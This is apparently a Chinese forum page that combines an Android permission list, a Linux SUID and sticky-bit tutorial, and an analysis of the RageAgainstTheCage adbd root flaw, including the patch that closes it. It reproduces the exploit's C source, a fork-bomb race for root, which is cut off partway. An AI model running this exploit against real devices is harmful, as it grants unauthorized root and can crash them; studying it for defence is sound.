//[/font][/size]允许程序设置时间区域[size=3][font=Calibri]
android.permission.SET_WALLPAPER
//[/font][/size]允许程序设置壁纸[size=3][font=Calibri]
android.permission.SET_WALLPAPER_HINTS
//[/font][/size]允许程序设置壁纸[size=3][font=Calibri]hits
android.permission.SIGNAL_PERSISTENT_PROCESSES
//[/font][/size]允许程序请求发送信号到所有显示的进程中[size=3][font=Calibri]
android.permission.STATUS_BAR
//[/font][/size]允许程序打开、关闭或禁用状态栏及图标[size=3][font=Calibri]Allows an application to open, close, or disable the status bar and its icons.
android.permission.SUBSCRIBED_FEEDS_READ
//[/font][/size]允许一个程序访问订阅[font=Calibri]RSS Feed[/font]内容提供[size=3][font=Calibri]
android.permission.SUBSCRIBED_FEEDS_WRITE
//[/font][/size]系统暂时保留改设置[font=Calibri],android[/font]开发网认为未来版本会加入该功能。[size=3][font=Calibri]
android.permission.SYSTEM_ALERT_WINDOW
//[/font][/size]允许一个程序打开窗口使用[font=Calibri] TYPE_SYSTEM_ALERT[/font],显示在其他所有程序的顶层[size=3][font=Calibri](Allows an application to open windows using the type TYPE_SYSTEM_ALERT, shown on top of all other applications. )
android.permission.VIBRATE
//[/font][/size]允许访问振动设备[size=3][font=Calibri]
android.permission.WAKE_LOCK
//[/font][/size]允许使用[font=Calibri]PowerManager[/font]的[font=Calibri] WakeLocks[/font]保持进程在休眠时从屏幕消失[size=3][font=Calibri]
android.permission.WRITE_APN_SETTINGS
//[/font][/size]允许程序写入[font=Calibri]APN[/font]设置[size=3][font=Calibri]
android.permission.WRITE_CALENDAR
//[/font][/size]允许一个程序写入但不读取用户日历数据[size=3][font=Calibri]
android.permission.WRITE_CONTACTS
//[/font][/size]允许程序写入但不读取用户联系人数据[size=3][font=Calibri]
android.permission.WRITE_GSERVICES
//[/font][/size]允许程序修改[font=Calibri]Google[/font]服务地图[size=3][font=Calibri]
android.permission.WRITE_OWNER_DATA
//[/font][/size]允许一个程序写入但不读取所有者数据[size=3][font=Calibri]
android.permission.WRITE_SETTINGS
//[/font][/size]允许程序读取或写入系统设置[size=3][font=Calibri]
android.permission.WRITE_SMS
//[/font][/size]允许程序写短信[size=3][font=Calibri]
android.permission.WRITE_SYNC_SETTINGS
//[/font][/size]允许程序写入同步设置

[size=5][b] [/b][/size]



[size=6][b][color=#1f497d]Linux[/color][color=#1f497d]的特殊文件权限[/color][/b][/size]


[size=3][font=Calibri] [/font][/size][align=left][b]发布于:[/b]  一般文件权限读(R),写(W),执行(X)权限比较简单。一般材料上面都有介绍。                 这里介绍一下一些特殊的文件权限——SUID,SGID,Stick bit。如果你检查一下/usr/bin/passwd和/tmp/的文件权限你就会发现和普通的文件权限有少许不同,如下图所示:[/align]
    这里就涉及到SUID和Stick bit。
[b]SUID和SGID[/b]
    我们首先来谈一下passwd程序特殊的地方。大家都知道,Linux把用户的密码信息存放在/etc/shadow里面,该文件属性如下:
可以看到Shadow的只有所有者可读写,所有者是root,所以该文件对普通用户是不可读写的。但是普通用户调用passwd程序是可以修改自己的密码的,这又是为什么呢?难道普通用户可以读写shadow文件?当然不是啦。password可以修改shadow文件的原因是他设置了SUID文件权限。
    SUID文件权限作用于可执行文件。一般的可执行文件在执行期的所有者是当前用户,比如当前系统用户是simon,simon运行程序a.out,a.out执行期的所有者应该是simon。[b][color=#0f13b1]但是如果我们给可执行文件设置了SUID[/color]权限,则该程序执行期间的所有者,就是该文件所有者[/b]。还以前面的a.out为例,假如a.out设置了SUID,并且其所有者是root,系统当前用户是simon,当simon运行a.out的时候,a.out在运行期的所有者就是root,这时a.out可以存取只有root权限才能存取的资源,比如读写shadow文件。当a.out执行结束的时候当前用户的权限又回到了simon的权限了。
     passwd就是设置了SUID权限,并且passwd的所有者是root,所以所有的用户都可以执行他,在passwd运行期,程序获得临时的root权限,这时其可以存取shadow文件。当passwd运行完成,当前用户又回到普通权限。
     同理,设置程序的SGID,可以使程序运行期可以临时获得所有者组的权限。在团队开发的时候,这个文件权限比较有用,一般系统用SUID比较多。
     SGID可以用于目录,当目录设置了SGID之后,在该目录下面建立的所有文件和目录都具有和该目录相同的用户组。
[b]Stick bit(粘贴位)[/b]
     对程序,该权限告诉系统在程序完成后在内存中保存一份运行程序的备份,如该程序常用,可为系统节省点时间,不用每次从磁盘加载到内存。Linux当前对文件没有实现这个功能,一些其他的UNIX系统实现了这个功能。
     Stick bit可以作用于目录,在设置了粘贴位的目录下面的文件和目录,只有所有者和root可以删除他。现在我们可以回头去看看/tmp/目录的情况,这个目录设置了粘贴位。所以说,所有人都可以对该目录读写执行(777),这样意味着所有人都可以在/tmp/下面创建临时目录。因为设置Stick bit只有所有者和root才能删除目录。这样普通用户只能删除属于自己的文件,而不能删除其他人的文件。如下图所示:
[b]设置SUID,SGID,Stick bit[/b]
     前面介绍过SUID与SGID的功能,那么,如何打开文件使其成为具有SUID与SGID的权限呢?这就需要使用数字更改权限了。现在应该知道,使用数字更改权限的方式为“3个数字”的组合,那么,如果在这3个数字之前再加上一个数字,最前面的数字就表示这几个属性了(注:通常我们使用chmod 0777 filename的方式来设置filename的属性时,则是假设没有SUID、SGID及Sticky bit)。
[b][color=#0f13b1]     4[/color][color=#0f13b1]为SUID
     2[/color]为SGID
     1为Sticky bit [/b]
     假设要将一个文件属性改为“-rwsr-xr-x”,由于s在用户权限中,所以是SUID,因此,在原先的755之前还要加上4,也就是使用“chmod 4755 filename”来设置。
     SUID也可以用“chmod u+s filename”来设置,“chmod u-s filename”来取消SUID设置;同样,SGID可以用“chmod g+s filename”,“chmod g-s filename”来取消SGID设置。
[size=3][font=Calibri] [/font][/size]

[size=6][b][color=#1f497d][url=http://my.unix-center.net/~Simon_fu/?p=1069][color=#1f497d]Android[/color][/url][/color][color=#1f497d]系统root[/color][color=#1f497d]破解原理分析[/color][/b][/size]


[size=3]获得root[/size]权限的代码如下:
[size=3][color=black]Process process = Runtime.getRuntime().exec([/color][color=#006080]"su"[/color][color=black]);[/color][/size]
[size=3][color=black]DataOutputStream os =[/color][color=blue]new[/color][/size]
[color=black][size=3]DataOutputStream(process.getOutputStream());[/size][/color]
[color=black][size=3] [/size][/color]......
[size=3][color=black]os.writeBytes([/color][color=#006080]"exit\n"[/color][color=black]);[/color][/size]
[color=black][size=3]os.flush();[/size][/color]
[color=black][size=3]process.waitFor();[/size][/color]
[size=3]    从上面代码我们可以看到首先要运行su程序,其实root的秘密都在su程序中,Android系统默认的su程序只能root和shell可以用运行su,如果把这个限制拿掉,就是root破解了![/size]
[size=3]    下面我们仔细分析一下程序是怎样获得root权限的,如果对Linux的su命令熟悉的朋友可能知道su程序都设置SUID位,我们查看一下已经root破解上的su权限设置,[/size]
[size=3][font=Calibri]      [/font][/size]我们发现[font=Calibri]su[/font]的所有者和所有组都是[font=Calibri]root[/font],是其实是[font=Calibri]busybox[/font]的软链接,我们查看[font=Calibri]busybox[/font]的属性发现,其设置了[font=Calibri]SUID[/font]和[font=Calibri]SGID[/font],并且所有者和所有组都是[font=Calibri]root[/font]。这样运行[font=Calibri]busybox[/font]的普通用户,[font=Calibri]busybox[/font]运行过程中获得的是[font=Calibri]root[/font]的有效用户。[font=Calibri]su[/font]程序则是把自己启动一个新的程序,并把自己权限提升至[font=Calibri]root[/font](我们前面提到[font=Calibri]su[/font]其实就是[font=Calibri]busybox[/font],运行期它的权限是[font=Calibri]root[/font],当然也有权限来提升自己的权限)。
[size=3][font=Calibri]     [/font][/size]再强调一下不光[font=Calibri]root[/font]手机上[font=Calibri]su[/font]需要设置[font=Calibri]SUID[/font],所有的[font=Calibri]Linux[/font]系统上的[font=Calibri]su[/font]程序都需要设置[font=Calibri]SUID[/font]位。

[size=3]     我们发现su也设置了SUID位,这样普通用户也可以运行su程序,su程序会验证root[/size]
[size=3]密码,如果正确su程序可以把用户权限提高的root(因为其设置SUID位,运行期是root权限,这样其有权限提升自己的权限)。[/size]
[size=3]     Android系统的破解的根本原理就是替换掉系统中的su程序,因为系统中的默认su程序需要验证实际用户权限(只有root和shell用户才有权运行系统默认的su程序,其他用户运行都会返回错误)。而破解后的su将不检查实际用户权限,这样普通的用户也将可以运行su程序,也可以通过su程序将自己的权限提升。[/size]
[size=3]     root破解没有利用什么Linux内核漏洞(Linux内核不可能有这么大的漏洞存在),可以理解成root破解就是在你系统中植入“木马su”,说它是“木马”一点儿都不为过,假如恶意程序在系统中运行也可以通过su来提升自己的权限的这样的结果将会是灾难性的。所以一般情况下root过手机都会有一个SuperUser应用程序来让用户管理允许谁获得root权限.但是要替换掉系统中su程序本身就是需要root权限的,怎样在root破解过程中获得root权限,假设需要破解的Android系统具备如下条件:[/size]
[size=3]1[/size][size=3]、可以通过adb连接到设备,一般意味着驱动程序已经安装。[/size][size=3]
2、但是adb获得用户权限是shell用户,而不是root。[/size]
[size=3]先了解一下adb工具,设备端有adbd服务程序后台运行,为开发机的adb程序提供服务,adbd的权限,决定了adb的权限。具体用户可查看/system/core/adb下的源码,查看Android.mk你将会发现adb和adbd其实是一份代码,然后通过宏来编译。[/size]
[size=3]查看adb.c的adb_main函数你将会发现adbd中有如下代码:[/size]
[size=3][color=#606060]   [/color]1:[color=blue]int[/color][color=black] adb_main([/color][color=blue]int[/color][color=black] is_daemon)[/color][/size]
[size=3][color=#606060]   [/color]2:[color=black] {[/color][/size]
[size=3][color=#606060]   [/color]3:[color=black]    [/color]......[/size]
[size=3][color=#606060]   [/color]4:[color=black]    [/color]property_get([color=#006080]"ro.secure"[/color][color=black], value,[/color][color=#006080]""[/color][color=black]);[/color][/size]
[size=3][color=#606060]   [/color]5:[color=black]    [/color][color=blue]if[/color][color=black] (strcmp(value,[/color][color=#006080]"1"[/color][color=black]) == 0) {[/color][/size]
[size=3][color=#606060]   [/color]6:[color=black]        [/color][color=green]// don't run as root if ro.secure is set...[/color][/size]
[size=3][color=#606060]   [/color]7:[color=black]   [/color]     secure = 1;[/size]
[size=3][color=#606060]   [/color]8:[color=black]        [/color]......[/size]
[size=3][color=#606060]   [/color]9:[color=black]    [/color]}[/size]
[size=3][color=#606060]  [/color]10:[color=black] [/color][/size]
[size=3][color=#606060]  [/color]11:[color=black]    [/color][color=blue]if[/color][color=black] (secure) {[/color][/size]
[size=3][color=#606060]  [/color]12:[color=black]        [/color]......[/size]
[size=3][color=#606060]  [/color]13:[color=black]        [/color]setgid(AID_SHELL);[/size]
[size=3][color=#606060]  [/color]14:[color=black]        [/color]setuid(AID_SHELL);[/size]
[size=3][color=#606060]  [/color]15:[color=black]        [/color]......[/size]
[size=3][color=#606060]  [/color]16:[color=black]    [/color]}[/size]
[size=3][color=#606060]  [/color]17:[color=black] }[/color][/size]
[size=3]从中我们可以看到adbd会检测系统的ro.secure属性,如果该属性为1则将会把自己的用户权限降级成shell用户。一般设备出厂的时候在/default.prop文件中都会有:[/size]
[size=3][color=#606060]   [/color]1:[color=black] ro.secure=1[/color][/size]
[size=3]这样将会使adbd启动的时候自动降级成shell用户。[/size]
[size=3]然后我们再介绍一下adbd在什么时候启动的呢?答案是在init.rc中配置的系统服务,由init进程启动。我们查看init.rc中有如下内容:[/size]
[size=3][color=#606060]   [/color]1:[color=black] # adbd is controlled by the persist.service.adb.enable system property[/color][/size]
[size=3][color=#606060]   [/color]2:[color=black] service adbd /sbin/adbd[/color][/size]
[size=3][color=#606060]   [/color]3:[color=black]    [/color]disabled[/size]
[size=3]对Android属性系统少有了解的朋友将会知道,在init.rc中配置的系统服务启动的时候都是root权限(因为init进行是root权限,其子程序也是root)。由此我们可以知道在adbd程序在执行:[/size]
[size=3][color=#606060]   [/color]1:[color=green]/* then switch user and group to "shell" */[/color][/size]
[size=3][color=#606060]   [/color]2:[color=black] setgid(AID_SHELL);[/color][/size]
[size=3][color=#606060]   [/color]3:[color=black] setuid(AID_SHELL);[/color][/size]
[size=3]代码之前都是root权限,只有执行这两句之后才变成shell权限的。[/size]
[size=3]这样我们就可以引出root破解过程中获得root权限的方法了,那就是让上面setgid和setuid函数执行失败,也就是降级失败,那就继续在root权限下面运行了。[/size]
[size=3]这里面做一个简单说明:[/size]
[size=3][font=Calibri]1[/font][/size]、出厂设置的[font=Calibri]ro.secure[/font]属性为[font=Calibri]1[/font],则[font=Calibri]adbd[/font]也将运行在[font=Calibri]shell[/font]用户权限下;
[size=3][font=Calibri]2[/font][/size][size=3]、[font=Calibri]adb[/font]工具创建的进程[font=Calibri]ratc[/font]也运行在[font=Calibri]shell[/font]用户权限下;[/size]
[size=3][font=Calibri]3[/font][/size]、[font=Calibri]ratc[/font]一直创建子进程([font=Calibri]ratc[/font]创建的子程序也将会运行在[font=Calibri]shell[/font]用户权限下),紧接着子程序退出,形成僵尸进程,占用[font=Calibri]shell[/font]用户的进程资源,直到到达[font=Calibri]shell[/font]用户的进程数为[font=Calibri]RLIMIT_NPROC[/font]的时候(包括[font=Calibri]adbd[/font]、[font=Calibri]ratc[/font]及其子程序),这是[font=Calibri]ratc[/font]将会创建子进程失败。这时候杀掉[font=Calibri]adbd[/font],[font=Calibri]adbd[/font]进程因为是[font=Calibri]Android[/font]系统服务,将会被[font=Calibri]Android[/font]系统自动重启,这时候[font=Calibri]ratc[/font]也在竞争产生子程序。在[font=Calibri]adbd[/font]程序执行上面[font=Calibri]setgid[/font]和[font=Calibri]setuid[/font]之前,[font=Calibri]ratc[/font]已经创建了一个新的子进程,那么[font=Calibri]shell[/font]用户的进程限额已经达到,则[font=Calibri]adbd[/font]进程执行[font=Calibri]setgid[/font]和[font=Calibri]setuid[/font]将会失败。根据代码我们发现失败之后[font=Calibri]adbd[/font]将会继续执行。这样[font=Calibri]adbd[/font]进程将会运行在[font=Calibri]root[/font]权限下面了。

[size=3]这时重新用[font=Calibri]adb[/font]连接设备,则[font=Calibri]adb[/font]将会运行在[font=Calibri]root[/font]权限下面了。[/size]
[size=3]通过上面的介绍我们发现利用RageAgainstTheCage漏洞,可以使adbd获得root权限,也就是adb获得了root权限。拿到root权限剩下的问题就好办了,复制破解之后的su程序到系统中,都是没有什么技术含量的事情了。[/size]
[size=3]其实堵住adbd的这个漏洞其实也挺简单的,新版本已经加两个这个补丁。[/size]
[size=3][color=#606060]   [/color]1:[color=green]/* then switch user and group to "shell" */[/color][/size]
[size=3][color=#606060]   [/color]2:[color=blue]if[/color][color=black] (setgid(AID_SHELL) != 0) {[/color][/size]
[size=3][color=#606060]   [/color]3:[color=black]    [/color]exit(1);[/size]
[size=3][color=#606060]   [/color]4:[color=black] }[/color][/size]
[size=3][color=#606060]   [/color]5:[color=blue]if[/color][color=black] (setuid(AID_SHELL) != 0) {[/color][/size]
[size=3][color=#606060]   [/color]6:[color=black]    [/color]exit(1);[/size]
[size=3][color=#606060]   [/color]7:[color=black] }[/color][/size][font=宋体]如果发现setgid和setuid函数执行失败,则adbd进程异常退出,就把这个漏洞给堵上了。[/font][font=宋体] [/font][font=宋体]http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2607[/font][url=http://blog.claudxiao.net/wp-content/uploads/2011/04/rageagainstthecage.c][color=#800080][font=宋体]http://blog.claudxiao.net/wp-content/uploads/2011/04/rageagainstthecage.c[/font][/color][/url][font=宋体] [/font][size=3][font=宋体]/* android 1.x/2.x adb setuid() root exploit[/font][/size][align=left] * (C) 2010 The Android Exploid Crew[/align][align=left] *[/align][align=left] * Needs to be executed via adb -d shell. It may take a while until[/align][align=left] * all process slots are filled and the adb connection is reset.[/align][align=left] *[/align][align=left] * !!!This is PoC code for educational purposes only!!![/align][align=left] * If you run it, it might crash your device and make it unusable![/align][align=left] * So you use it at your own risk![/align][align=left] */[/align][align=left]#include <stdio.h>[/align][align=left]#include <sys/types.h>[/align][align=left]#include <sys/time.h>[/align][align=left]#include <sys/resource.h>[/align][align=left]#include <unistd.h>[/align][align=left]#include <fcntl.h>[/align][align=left]#include <errno.h>[/align][align=left]#include <string.h>[/align][align=left]#include <signal.h>[/align][align=left]#include <stdlib.h>[/align][align=left] [/align][align=left] [/align][align=left]void die(const char *msg)[/align][align=left]{[/align][align=left]        perror(msg);[/align][align=left]        exit(errno);[/align][align=left]}[/align][align=left] [/align][align=left]pid_t find_adb()[/align][align=left]{[/align][align=left]        char buf[256];[/align][align=left]        int i = 0, fd = 0;[/align][align=left]        pid_t found = 0;[/align][align=left] [/align][align=left]        for (i = 0; i < 32000; ++i) {[/align][align=left]               sprintf(buf, "/proc/%d/cmdline", i);[/align][align=left]               if ((fd = open(buf, O_RDONLY)) < 0)[/align][align=left]                       continue;[/align][align=left]               memset(buf, 0, sizeof(buf));[/align][align=left]               read(fd, buf, sizeof(buf) - 1);[/align][align=left]               close(fd);[/align][align=left]               if (strstr(buf, "/sbin/adb")) {[/align][align=left]                       found = i;[/align][align=left]                       break;[/align][align=left]               }[/align][align=left]        }[/align][align=left]        return found;[/align][align=left]}[/align][align=left] [/align][align=left] [/align][align=left]void restart_adb(pid_t pid)[/align][align=left]{[/align][align=left]        kill(pid, 9);[/align][align=left]}[/align][align=left] [/align][align=left] [/align][align=left]void wait_for_root_adb(pid_t old_adb)[/align][align=left]{[/align][align=left]        pid_t p = 0;[/align][align=left] [/align][align=left]        for (;;) {[/align][align=left]               p = find_adb();[/align][align=left]               if (p != 0 && p != old_adb)[/align][align=left]                       break;[/align][align=left]               sleep(1);[/align][align=left]        }[/align][align=left]        sleep(5);[/align][align=left]        kill(-1, 9);[/align][align=left]}[/align][align=left] [/align][align=left] [/align][align=left]int main(int argc, char **argv)[/align][align=left]{[/align][align=left]        pid_t adb_pid = 0, p;[/align][align=left]        int pids = 0, new_pids = 1;[/align][align=left]        int pepe[2];[/align][align=left]        char c = 0;[/align][align=left]        struct rlimit rl;[/align][align=left] [/align][align=left]        printf("[*] CVE-2010-EASY Android local root exploit (C) 2010 by 743C\n\n");[/align][align=left]        printf("[*] checking NPROC limit ...\n");[/align][align=left] [/align][align=left]        if (getrlimit(RLIMIT_NPROC, &rl) < 0)[/align][align=left]               die("[-] getrlimit");[/align][align=left] [/align][align=left]        if (rl.rlim_cur == RLIM_INFINITY) {[/align][align=left]               printf("[-] No RLIMIT_NPROC set. Exploit would just crash machine. Exiting.\n");[/align][align=left]               exit(1);[/align][align=left]        }[/align][align=left] [/align][align=left]        printf("[+] RLIMIT_NPROC={%lu, %lu}\n", rl.rlim_cur, rl.rlim_max);[/align][align=left]        printf("[*] Searching for adb ...\n");[/align][align=left] [/align][align=left]        adb_pid = find_adb();[/align][align=left] [/align][align=left]        if (!adb_pid)[/align][align=left]               die("[-] Cannot find adb");[/align][align=left] [/align][align=left]        printf("[+] Found adb as PID %d\n", adb_pid);[/align][align=left]        printf("[*] Spawning children. Dont type anything and wait for reset!\n");[/align][align=left]        printf("[*]\n[*] If you like what we are doing you can send us PayPal money to\n"[/align][align=left]               "[*] [email]7-4-3-C@web.de[/email] so we can compensate time, effort and HW costs.\n"[/align][align=left]               "[*] If you are a company and feel like you profit from our work,\n"[/align][align=left]               "[*] we also accept donations > 1000 USD!\n");[/align][align=left]        printf("[*]\n[*] adb connection will be reset. restart adb server on desktop and re-login.\n");[/align][align=left] [/align][align=left]        sleep(5);[/align][align=left] [/align][align=left]        if (fork() > 0)[/align][align=left]               exit(0);[/align][align=left] [/align][align=left]        setsid();[/align][align=left]        pipe(pepe);[/align][align=left] [/align][align=left]        /* generate many (zombie) shell-user processes so restarting[/align][align=left]         * adb's setuid() will fail.[/align][align=left]         * The whole thing is a bit racy, since when we kill adb[/align][align=left]         * there is one more process slot left which we need to[/align][align=left]         * fill before adb reaches setuid(). Thats why we fork-bomb[/align][align=left]         * in a seprate process.[/align][align=left]         */[/align][align=left]        if (fork() == 0) {[/align][align=left]               close(pepe[0]);[/align][align=left]               for (;;) {[/align][align=left]                       if ((p = fork()) == 0) {[/align][align=left]                               exit(0);[/align][align=left]                       } else if (p < 0) {[/align][align=left]                               if (new_pids) {[/align][align=left]                                   &nb

路过

雷人

握手

鲜花

鸡蛋

评论 (0 个评论)

facelist

您需要登录后才可以评论 登录 | 立即注册

Copyright ©2011-2024 NTpcb.com All Right Reserved.  Powered by Discuz! (NTpcb)

本站信息均由会员发表,不代表NTpcb立场,如侵犯了您的权利请发帖投诉

( 闽ICP备2024076463号-1 ) 论坛技术支持QQ群171867948 ,论坛问题,充值问题请联系QQ1308068381

平平安安
TOP
返回顶部